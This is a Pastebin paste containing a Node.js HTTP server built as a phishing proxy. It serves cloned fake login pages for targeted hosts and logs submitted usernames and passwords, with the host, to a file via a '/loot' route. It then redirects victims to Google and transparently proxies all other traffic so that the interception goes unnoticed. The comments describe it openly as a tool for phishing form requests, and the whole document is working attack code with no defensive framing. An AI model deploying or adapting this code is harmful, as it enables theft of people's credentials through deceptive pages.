SHARE
TWEET

Untitled

a guest Jul 16th, 2019 73 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. const http = require('http');
  2. const fs = require('fs');
  3. const url = require('url');
  4.  
  5.  
  6. http.createServer((incomingRequest, endResponse) => {
  7.  
  8.     // CASE 1: Deal with phishing form requests
  9.     if (incomingRequest.url.match(/^\/loot/)){
  10.         saveCredentials(incomingRequest);
  11.         endResponse.statusCode = 302;
  12.         endResponse.setHeader("Location", "www.google.fr");
  13.         return endResponse.end();
  14.     }
  15.  
  16.     // Check if requested file match one of the fake templates we have.
  17.     fs.lstat("/var/www/sites/" + incomingRequest.headers.host + incomingRequest.url , (err, stats) => {
  18.  
  19.         if (!err){
  20.             if (stats.isFile()){
  21.                 // CASE 2: We have a template to inject for this specific request.
  22.                 // We create the template and write the content as a response.
  23.                 return createTemplate("/var/www/sites/" + incomingRequest.headers.host + incomingRequest.url, (injected) => {
  24.                     return endResponse.end(injected);
  25.                 });
  26.             }
  27.         }  
  28.  
  29.         // CASE 3: This is a regular request and we don't have anything to inject. So we just proxy it.
  30.         console.log("Proxying request...");
  31.  
  32.         // The forged "cloned" request options. We copy the headers, the url, method and host from the original request.
  33.         var requestOptions = {
  34.             host: incomingRequest.headers.host,
  35.             path: incomingRequest.url,
  36.             port: 80,
  37.             method: incomingRequest.method,
  38.             headers: incomingRequest.headers,
  39.         };
  40.  
  41.         // Start the request.
  42.         const clonedRequest = http.request(requestOptions, (serverResponse) => {
  43.  
  44.             // This callback is executed after the cloned request has been sent.
  45.            
  46.             // We can already retrieve the status code from the server, we need to copy them to the final response.
  47.             endResponse.statusCode = serverResponse.statusCode;
  48.            
  49.             // ...and the headers.
  50.             Object.entries(serverResponse.headers).forEach((header) => {
  51.                 endResponse.setHeader(header[0], header[1]);
  52.             });
  53.  
  54.  
  55.             // this is for the body. we also need to set a listener and wait for data to go through the stream.
  56.             serverResponse.on('data', (data) => {
  57.                 // pipe it to the final response.
  58.                 return endResponse.write(data);
  59.             });
  60.  
  61.             // when the server has ended the transmission.
  62.             serverResponse.on('end', () => {
  63.                 // ... we end the final response.
  64.                 return endResponse.end();
  65.             });
  66.         });
  67.  
  68.         // read eventual data (body of the request) from the original request.
  69.         incomingRequest.on('data', (data) => {
  70.             // write it through the clone request.
  71.             return clonedRequest.write(data);
  72.         });
  73.  
  74.  
  75.         // when there's no more data to read, end the cloned request stream.
  76.         incomingRequest.on('end', () => {
  77.             return clonedRequest.end();
  78.         });
  79.     });
  80.    
  81.  
  82. }).listen(80);
  83.  
  84.  
  85. function createTemplate(website, callback){
  86.     fs.readFile(website, (err, data) => {
  87.         return callback(data ? data : "");
  88.     });
  89. }
  90.  
  91. function saveCredentials(requestObject){
  92.     var query = url.parse(requestObject.url, true).query;
  93.     fs.writeFile("output.txt", query.username + ":" + query.password + " ("+ requestObject.headers.host +")\r\n", () => {});
  94. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top